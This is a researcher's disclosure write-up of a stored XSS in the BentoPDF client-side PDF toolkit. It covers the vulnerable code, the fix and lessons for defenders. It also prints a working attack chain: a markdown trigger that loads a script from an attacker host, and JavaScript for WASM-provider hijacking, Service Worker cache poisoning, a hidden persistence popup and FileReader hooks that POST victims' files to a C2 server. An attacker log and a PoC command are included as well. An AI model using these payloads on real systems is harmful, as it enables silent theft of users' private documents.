CVE-2026-41653: Stored XSS > File Exfiltration in BentoPDF

One of the things I keep asking myself when I review source code is: “what is this application’s real attack surface?” Not in the abstract sense (every application has attack surface), but in the concrete sense: if I get code execution here, what can I actually reach? What data moves through this thing, and where does it go?

I found BentoPDF while working on a personal project. I was browsing GitHub looking for interesting open-source tools, stumbled across it, and thought: privacy-first, fully client-side PDF processor, WebAssembly, zero backend. Architecturally unusual. Worth a closer look.

What I found was not a particularly exotic vulnerability at the source level: the injection point was, honestly, quite obvious once you know what you’re looking for. Most of the time went into building a PoC that demonstrated a concrete impact. Finding the bug is one thing; showing what an attacker actually does with it is another.

What is BentoPDF?

BentoPDF is a self-hosted, open-source PDF toolbox. Compress, merge, split, rotate, convert images and documents to PDF, extract pages, add watermarks, fill forms, sign: a Swiss Army knife for PDFs, all running in the browser. The Docker image is a single nginx container serving a statically built Vite/TypeScript application. No backend. No server-side processing. Everything (and I mean everything) happens client-side using WebAssembly modules (PyMuPDF, Ghostscript, cpdf) that run directly in the browser.

The BentoPDF maintainer explicitly describes it as “The Privacy First PDF Toolkit”. The official website and the GitHub repository make the value proposition clear: no uploads to cloud services, no third-party servers, your documents stay on your machine. It’s the kind of tool that small teams, legal offices, and freelancers self-host precisely because they handle sensitive material they don’t want leaving their infrastructure.

That positioning is important context for what follows. The privacy guarantee is not just marketing: it is architecturally real. Files are processed entirely in the browser via WebAssembly and nothing is ever sent to the server. But that same architecture, under the conditions I’ll describe, can be inverted: instead of staying on your machine, files can leave it silently and be redirected to the attacker. The very property that makes BentoPDF trustworthy becomes the mechanism of the attack.

Code review

I started the usual way: understanding the architecture before reading individual files. Vite build, TypeScript source under src/js/, one entry point per tool (markdown-to-pdf.html, compress-pdf.html, etc.), nginx serving everything as static files. No API endpoints. No authentication. Just a browser application that receives your files, processes them in a WebAssembly sandbox, and returns the result.

The attack surface of an application with no backend is, at first glance, narrow. There is no SQL injection, no server-side template injection, no SSRF. What’s left? Essentially two things: XSS and anything that involves how user-controlled data is processed client-side.

I focused on input entry points: file uploads, text inputs, configuration fields. Then the Markdown-to-PDF converter caught my attention, and if you have any web security research experience you’ll immediately understand why. It renders user-supplied Markdown in a live preview. Live preview means: user input > rendering > DOM.

So I started tracing the code.

Flaw 1: `html: true` in markdown-it

src/js/utils/markdown-editor.ts, lines 271–272:

private mdOptions: MarkdownItOptions = {
  html: true,
  breaks: false,
  linkify: true,
  typographer: true,
};

markdown-it with html: true is explicitly documented as unsafe: raw HTML tags in the input pass through the parser unchanged. The library’s own security documentation says this option should only be enabled when you fully trust the input, or when you sanitize the output before injecting it into the DOM. Neither condition was met here.

Tags like <img>, <svg>, <details>, <video> with event handler attributes (onerror, onload, ontoggle, onmouseover) pass through without modification. This is by design: html: true is a flag that says “I want raw HTML”, and markdown-it delivers exactly that.

Flaw 2: Unsanitized `innerHTML`

src/js/utils/markdown-editor.ts, lines 689–694:

private updatePreview(): void {
  if (!this.editor || !this.preview) return;
  const markdown = this.editor.value;
  const html = this.md.render(markdown);
  this.preview.innerHTML = html;  // sink
  this.renderMermaidDiagrams();
}

The rendered string is assigned to innerHTML with nothing in between. No DOMPurify, no allow-list, no sanitization of any kind. The parser produces the string, the string goes straight into the DOM. The browser parses it, encounters the event handler, fires it.

Flaw 3: No Content-Security-Policy

nginx.conf ships with no Content-Security-Policy header. Injected JavaScript has complete freedom: it can load external scripts from any origin, issue fetch() or XMLHttpRequest requests to any host, open popup windows, register Service Workers. Any mitigating layer that a reasonable CSP would have provided is simply absent.
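
As a rough illustration of the missing layer, the sketch below assembles a restrictive policy string. The directive values are assumptions chosen for a static, client-side app that runs WebAssembly; they are not BentoPDF's actual policy, and `buildCsp` is a hypothetical helper.

```javascript
// Hypothetical helper: turn a directive map into a CSP header value.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(' ')}`)
    .join('; ');
}

// Assumed policy for a static app that runs WebAssembly locally.
const policy = buildCsp({
  'default-src': ["'self'"],
  // 'wasm-unsafe-eval' permits WebAssembly compilation without allowing eval().
  'script-src': ["'self'", "'wasm-unsafe-eval'"],
  // Restricts fetch()/XHR targets, which is what exfiltration relies on.
  'connect-src': ["'self'"],
  'object-src': ["'none'"],
  'base-uri': ["'self'"],
});

console.log(`Content-Security-Policy: ${policy}`);
```

Under a policy along these lines, the browser would refuse both the inline onerror handler and a script loaded from a foreign host, and fetch() to another origin would fail. A deployment that pulls its WASM modules from a different host would need to list that host explicitly.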

The trigger

A crafted .md file:

# Quarterly Financial Report Q1 2026

## Executive Summary

Revenue growth exceeded expectations at 12.3% YoY...

<img src=x onerror="var s=document.createElement('script');s.src='http://attacker/poc_payload.js';document.head.appendChild(s)">

## Outlook

Management maintains FY2026 guidance...

The victim opens this file in the Markdown-to-PDF tool. The preview renders immediately. The <img src=x> fails to load (the source is invalid), onerror fires, a <script> tag is injected into <head>, and the external payload is loaded. No CSP blocks it.

Thinking about the attack chain

This is where it gets interesting, and where I spent most of my time.

The sink is on the Markdown-to-PDF page. In a traditional web application with a backend, this would be a classic stored XSS: the payload persists server-side, anyone who views the page gets hit. But BentoPDF has no backend. The Markdown file lives on the victim’s machine. To exploit this, the attacker must deliver a crafted .md file to the victim and convince them to open it in the tool. Social engineering, shared drive, email attachment: delivery happens outside the application.

Once the payload executes, I’m in the origin of the application. Now what?

In most web applications the answer is: steal the session cookie, do whatever the victim can do on the platform. But BentoPDF has no session, no authentication, no user account. There is nothing to steal in the traditional sense. This is the challenge that made the research genuinely interesting: the vulnerability was obvious, but making it matter required a different kind of thinking.

I started from a simple question: what is valuable in this application? Not credentials, not tokens, not API keys. The valuable thing is the data the user brings to it: the files. PDFs, contracts, invoices, medical documents: whatever made someone choose a privacy-first, self-hosted PDF tool rather than uploading to iLovePDF or Adobe online. The files are the crown jewels, and the entire processing pipeline (every read, every conversion) runs directly in the victim’s browser via the FileReader API and WebAssembly.

The insight that shaped the entire payload: the attacker’s code is now running in the same context that handles the victim’s files. If I hook FileReader.prototype.readAsArrayBuffer before BentoPDF calls it, I intercept every file the victim loads into any tool: not just Markdown-to-PDF, but Compress PDF, Merge PDF, Split PDF, everything. I don’t need server access. I don’t need credentials. I just need to stay resident in the browser.

But staying resident across page navigations is the hard part. BentoPDF uses a separate HTML file per tool: going from markdown-to-pdf.html to compress-pdf.html is a full page load. My hooks on the Markdown-to-PDF page die with the navigation. I needed persistence.

This is where the 1×1 pixel popup comes in, a technique that will likely be familiar to anyone who has ever visited an illegal streaming site. Those sites routinely open tiny off-screen windows that remain alive even after you close the main tab, silently running ad scripts or cryptocurrency miners. The browser’s popup mechanism is not subject to navigation events: a popup opened from page A stays open when page A navigates to page B. And crucially, window.opener in the popup still points to the navigated tab.

I used exactly this mechanism. A 1×1 popup, positioned off-screen, invisible to the victim, running a polling loop that re-injects the FileReader hook into the main window every time a navigation clears it. Within one second of any tool switch, the hooks are live again.

The payload: four stages

The payload is a multi-stage IIFE loaded once and designed to persist for as long as the victim has BentoPDF open.

Stage 1: WASM provider hijack

var _origWasm = localStorage.getItem('bentopdf:wasm-providers');
var wasmPayload = {
  pymupdf:     C2 + '/wasm/pymupdf/',
  ghostscript: C2 + '/wasm/gs/',
  cpdf:        C2 + '/wasm/cpdf/'
};
localStorage.setItem('bentopdf:wasm-providers', JSON.stringify(wasmPayload));
report('/hijack', { stage: 'wasm_hijack', victim: location.href, ts: new Date().toISOString() });
if (_origWasm !== null) {
  localStorage.setItem('bentopdf:wasm-providers', _origWasm);
} else {
  localStorage.removeItem('bentopdf:wasm-providers');
}

BentoPDF reads WASM module download URLs from localStorage['bentopdf:wasm-providers']. By overwriting this key, the attacker can redirect all WASM module downloads (PyMuPDF, Ghostscript, cpdf) to an attacker-controlled server. A trojanized WASM module would be executed with the same privileges as the original: full access to every PDF the victim processes, across every browser session.

In this PoC, the key is overwritten, the hijack is reported to the exfiltration server as proof, and then immediately restored, so the victim’s tools continue working normally without anything appearing anomalous.
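
One way a loader could blunt this kind of override is to validate the stored value before using it. The sketch below is only an illustration under assumptions: `loadWasmProviders` and the `TRUSTED_ORIGINS` allow-list are hypothetical names, the example hosts are placeholders, and this is not the fix BentoPDF shipped.

```javascript
// Hypothetical allow-list of origins permitted to serve WASM modules.
const TRUSTED_ORIGINS = new Set(['https://pdf.example.internal']);

// Returns the parsed provider map with untrusted entries dropped.
// `raw` is the string read from storage (or null if the key is unset).
function loadWasmProviders(raw, trustedOrigins = TRUSTED_ORIGINS) {
  if (raw === null) return {};
  let parsed;
  try {
    parsed = JSON.parse(raw);
  } catch {
    return {}; // Malformed JSON: ignore the override entirely.
  }
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) return {};

  const safe = {};
  for (const [name, url] of Object.entries(parsed)) {
    if (typeof url !== 'string') continue;
    try {
      // Only absolute URLs parse here; relative ones throw and are skipped.
      if (trustedOrigins.has(new URL(url).origin)) safe[name] = url;
    } catch {
      // Not a valid absolute URL.
    }
  }
  return safe;
}

const stored = JSON.stringify({
  pymupdf: 'https://pdf.example.internal/wasm/pymupdf/',
  cpdf: 'http://attacker.example/wasm/cpdf/',
});
console.log(loadWasmProviders(stored));
```

In a browser the argument would be `localStorage.getItem('bentopdf:wasm-providers')`. A check like this limits what a leftover value can do on later visits; it does not help while attacker code is still running in the page.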

Stage 2: Service Worker + cache poisoning (HTTPS only)

On HTTPS deployments (window.isSecureContext === true), the payload registers /sw.js as a Service Worker, then enumerates every /assets/*.js file across all BentoPDF tool pages and poisons the browser cache. Each poisoned entry has the original JavaScript content plus an appended hook:

;(function(){
  if (window.__BENTO_EXFIL__) return;
  window.__BENTO_EXFIL__ = 1;
  // ... FileReader hook + change event listener ...
  fetch(C2 + "/beacon", { ... });
})();

On subsequent visits, even after the tab is closed and reopened, the Service Worker serves the poisoned JS from cache. The hook re-installs itself automatically. This is persistence beyond the browser session, without any server access.

Stage 3: Popup monitor

var popup = window.open('about:blank', '_bentopdf_helper', 'width=1,height=1,left=-100,top=-100');
popup.document.write(popupCode);
popup.document.close();
popup.blur(); window.focus();

A 1×1 pixel popup opens off-screen, invisible to the victim. Inside it runs a loop:

setInterval(function() {
  if (target && !target.closed && !target.__BENTO_EXFIL__) inject();
}, 1000);

Every second, the popup checks whether window.__BENTO_EXFIL__ is set on the main window. When the victim navigates from Markdown-to-PDF to another tool (Compress PDF, Merge PDF, etc.), the main window loads a new page. The popup’s window.opener reference remains valid: it still points to the same tab, which now hosts the new page. __BENTO_EXFIL__ on the new page is undefined, so inject() fires: it re-hooks FileReader.prototype.readAsArrayBuffer and adds a change event listener on target.document. Within one second of any navigation, the hooks are live again.
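
The re-injection logic can be modeled outside a browser with plain objects. In this sketch `makeTab`, `inject`, and `tick` are hypothetical stand-ins: `page` plays the role of the window globals that a full page load discards, and `tick` is one iteration of the polling loop.

```javascript
// Stand-in for a browser tab: `page` is replaced wholesale on navigation,
// the same way a full page load discards the previous window globals.
function makeTab() {
  return { closed: false, page: {} };
}

// Stand-in for inject(): marks the current page as hooked.
function inject(tab) {
  tab.page.__BENTO_EXFIL__ = 1;
}

// One iteration of the popup's polling loop. Returns true if it re-injected.
function tick(tab) {
  if (tab && !tab.closed && !tab.page.__BENTO_EXFIL__) {
    inject(tab);
    return true;
  }
  return false;
}

const tab = makeTab();
console.log(tick(tab)); // first tick hooks the page
console.log(tick(tab)); // already hooked, nothing to do
tab.page = {};          // navigation: fresh page, marker gone
console.log(tick(tab)); // next tick hooks the new page
```

The marker doubles as an idempotence guard: the loop can run as often as it likes without stacking duplicate hooks on a page that is already instrumented.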

This covers the persistence gap between stages: even without the Service Worker, the victim is hooked for the entire duration of the browser session.

Stage 4: Immediate hooks on the current page

var _origRead = FileReader.prototype.readAsArrayBuffer;
FileReader.prototype.readAsArrayBuffer = function(blob) {
  var fname = blob.name || 'unknown_' + Date.now();
  blob.arrayBuffer().then(function(buf) {
    fetch(C2 + '/file?name=' + encodeURIComponent(fname), {
      method: 'POST', mode: 'cors', body: buf
    }).catch(function(){});
  });
  return _origRead.call(this, blob);
};

document.addEventListener('change', function(e) {
  if (e.target && e.target.type === 'file' && e.target.files) {
    Array.from(e.target.files).forEach(function(f) {
      f.arrayBuffer().then(function(buf) {
        fetch(C2 + '/file?name=' + encodeURIComponent(f.name), {
          method: 'POST', mode: 'cors', body: buf
        }).catch(function(){});
      });
    });
  }
}, true);

Two hooks, installed immediately on the page where the payload fires.

The FileReader hook intercepts at the prototype level: every call to readAsArrayBuffer anywhere in the application goes through this wrapper first, which sends the raw bytes to the attacker before delegating to the original implementation. The application continues working normally: the processing pipeline is unaffected.
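
The same wrapping pattern can be shown in isolation. The sketch below uses a hypothetical `FakeReader` class in place of FileReader so it runs outside a browser; the point is that patching the prototype affects every instance, including ones created before the patch.

```javascript
// Stand-in for FileReader so the pattern can run outside a browser.
class FakeReader {
  readAsArrayBuffer(blob) {
    return `read:${blob.name}`;
  }
}

const seen = [];
const before = new FakeReader(); // created before the patch is installed

// Wrap the prototype method: observe the argument, then delegate.
const original = FakeReader.prototype.readAsArrayBuffer;
FakeReader.prototype.readAsArrayBuffer = function (blob) {
  seen.push(blob.name); // the PoC sends the bytes out at this point
  return original.call(this, blob);
};

const after = new FakeReader();
console.log(before.readAsArrayBuffer({ name: 'a.pdf' })); // read:a.pdf
console.log(after.readAsArrayBuffer({ name: 'b.pdf' }));  // read:b.pdf
console.log(seen); // [ 'a.pdf', 'b.pdf' ]
```

Because the wrapper returns whatever the original returns and preserves `this`, callers cannot tell the difference from behavior alone.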

The change event listener on document (capture phase) catches every file input interaction before BentoPDF’s own handlers see it. The result is the same: the file bytes go out to the attacker the moment the victim selects a file.

What the attacker sees

[17:11:11] WASM HIJACK      { stage: 'wasm_hijack', victim: '.../markdown-to-pdf.html' }
[17:11:12] BEACON           { page: '.../markdown-to-pdf.html' }
[17:11:55] BEACON           { page: '.../index.html' }
[17:12:00] BEACON           { page: '.../compress-pdf.html' }
[17:12:01] FILE EXFILTRATED   Lorem_ipsum.pdf (23.7 KB) -> loot/171201_Lorem_ipsum.pdf
[17:13:57] BEACON           { page: '.../merge-pdf.html' }
[17:13:58] FILE EXFILTRATED   Lorem_ipsum.pdf (23.7 KB) -> loot/171358_Lorem_ipsum.pdf

When I saw the loot/ directory populate for the first time, with a complete valid PDF arriving on my machine while the victim’s application was still showing the compress operation completing successfully, the thought was: ok, this will convince the developers. Not an alert(1). An actual file, byte-for-byte identical to the original, silently exfiltrated while the UI showed nothing unusual. That’s the kind of evidence that communicates impact without any explanation required.

The PoC

The full proof of concept is available in the CVE-2026-41653 repository. It consists of a single self-contained Python script (poc.py) that:

Generates the malicious poc_report.md with the correct attacker URL embedded
Serves the payload JavaScript dynamically at /poc_payload.js
Receives exfiltrated files and telemetry, saves them to ./loot/

python3 poc.py --lhost <YOUR_IP> --lport 9999

Responsible disclosure

I reported the issue through a GitHub Security Advisory, including the full technical description, the four-stage payload, and screenshots from the exfiltration server. I then found the maintainer’s contact on LinkedIn and messaged him to let him know a report was incoming.

He responded immediately. What followed was, genuinely, one of the best disclosure experiences I’ve had. The maintainer was courteous and attentive, both to the report itself and to his users. He acknowledged the finding quickly, released a fix on the edge build, asked me for a retest, and once I confirmed the fix was solid, published the GHSA advisory and personally notified his users of the potential risk. No pushback, no downplaying, no delays. An example of how responsible disclosure should work, on both sides.

A broader internal audit, following my report, uncovered several related vectors:

Mermaid diagrams: the Mermaid integration used securityLevel: 'loose' and wrote SVG content via innerHTML without sanitization, bypassing any sanitizer applied upstream. Fixed with securityLevel: 'strict' and a second DOMPurify pass on SVG output.
file.name XSS: approximately 8 tool pages (Deskew, Form Filler, Remove Annotations, etc.) concatenated the filename directly into HTML without escaping. A specially named file would trigger XSS without any Markdown involved.
WASM provider persistence: the localStorage key used to override WASM providers was not validated on load: any value set there would be used, with no origin check. An attacker who had already achieved WASM hijack through other means could leave it in place persistently.
Service Worker cache: the existing SW lacked integrity checks, making it trivially poisonable on HTTPS deployments.

All of these were addressed in v2.8.3, along with a full security header set in nginx.conf (including Content-Security-Policy).

The fix on the originally reported sink was:

import DOMPurify from 'dompurify';

private updatePreview(): void {
  if (!this.editor || !this.preview) return;
  const markdown = this.editor.value;
  const html = this.md.render(markdown);
  this.preview.innerHTML = DOMPurify.sanitize(html);
}

html: true can stay: it enables legitimate HTML in Markdown, which is a deliberate feature. The fix is to sanitize the output before it touches the DOM, which is exactly what DOMPurify is designed for.

Lessons learned

For developers:

html: true in markdown-it is a double-edged sword. The library’s documentation says it clearly: when enabled, you are responsible for sanitizing the output before DOM injection. If you let the parser produce raw HTML and then assign it to innerHTML, you have an XSS. DOMPurify between md.render() and innerHTML is the fix, not a workaround.
Client-side-only applications are not inherently safer than those with a backend. They have a different attack surface, not a smaller one. When your application is the processing environment for sensitive files, code execution in that environment is as damaging as server compromise.
A Content-Security-Policy is not optional in 2026. In this case, a directive like script-src 'self' would have stopped the chain at the browser level: without 'unsafe-inline', the inline onerror handler would not have run at all, and even under a policy that tolerated inline handlers, loading a multi-stage payload from a remote host would have been blocked. Defense in depth.
Filename sanitization is not optional. Concatenating file.name into HTML is an XSS waiting to happen. Use textContent for plain-text display, or sanitize if HTML is required.
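
For the filename case, where string templates cannot easily be replaced with textContent, escaping before concatenation is a reasonable minimum. This is a generic sketch: `escapeHtml` is a hypothetical helper and the file name is an invented example, not taken from the BentoPDF fix.

```javascript
// Escape the five characters that are significant in HTML text and attributes.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical file name an attacker might choose.
const fileName = '<img src=x onerror=alert(1)>.pdf';
console.log(`<span class="name">${escapeHtml(fileName)}</span>`);
```

The escaped name is displayed literally instead of being parsed as a tag. Escaping like this only suits text and quoted attribute values; where real HTML must be rendered, a sanitizer is still needed.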

For security researchers:

When you find an XSS in a client-side application, don’t stop at alert(1). Ask: what data does this application process? What APIs does it use? If the answer is FileReader and WebAssembly, you have everything you need to demonstrate a much more impactful scenario.
The architecture shapes the impact. A client-side PDF processor is interesting precisely because the files (potentially sensitive documents) never leave the browser. Once you have code execution in that context, that premise inverts completely: they do leave the browser, to the attacker.
Look at what the app stores in localStorage. Configuration, feature flags, provider URLs are often writable from XSS context and can have persistent effects.
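
A quick way to act on the localStorage point during a review is to list entries whose values contain URLs. The sketch below is an assumption-laden helper, not part of the PoC: `findUrlEntries` and `fakeStorage` are hypothetical names, and the stored values are invented for the example.

```javascript
// Returns [key, value] pairs whose value contains an http(s) URL.
// `storage` is anything with the Web Storage shape: length, key(i), getItem(k).
function findUrlEntries(storage) {
  const hits = [];
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    const value = storage.getItem(key);
    if (/https?:\/\//i.test(value ?? '')) hits.push([key, value]);
  }
  return hits;
}

// Minimal stand-in for localStorage so the sketch runs outside a browser.
function fakeStorage(entries) {
  const keys = Object.keys(entries);
  return {
    get length() { return keys.length; },
    key: (i) => keys[i] ?? null,
    getItem: (k) => (k in entries ? entries[k] : null),
  };
}

const storage = fakeStorage({
  theme: 'dark',
  'bentopdf:wasm-providers': '{"cpdf":"https://cdn.example/wasm/cpdf/"}',
});
console.log(findUrlEntries(storage).map(([key]) => key));
```

In a browser console the call would simply be `findUrlEntries(localStorage)`. Any key it reports is worth tracing back to the code that reads it.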
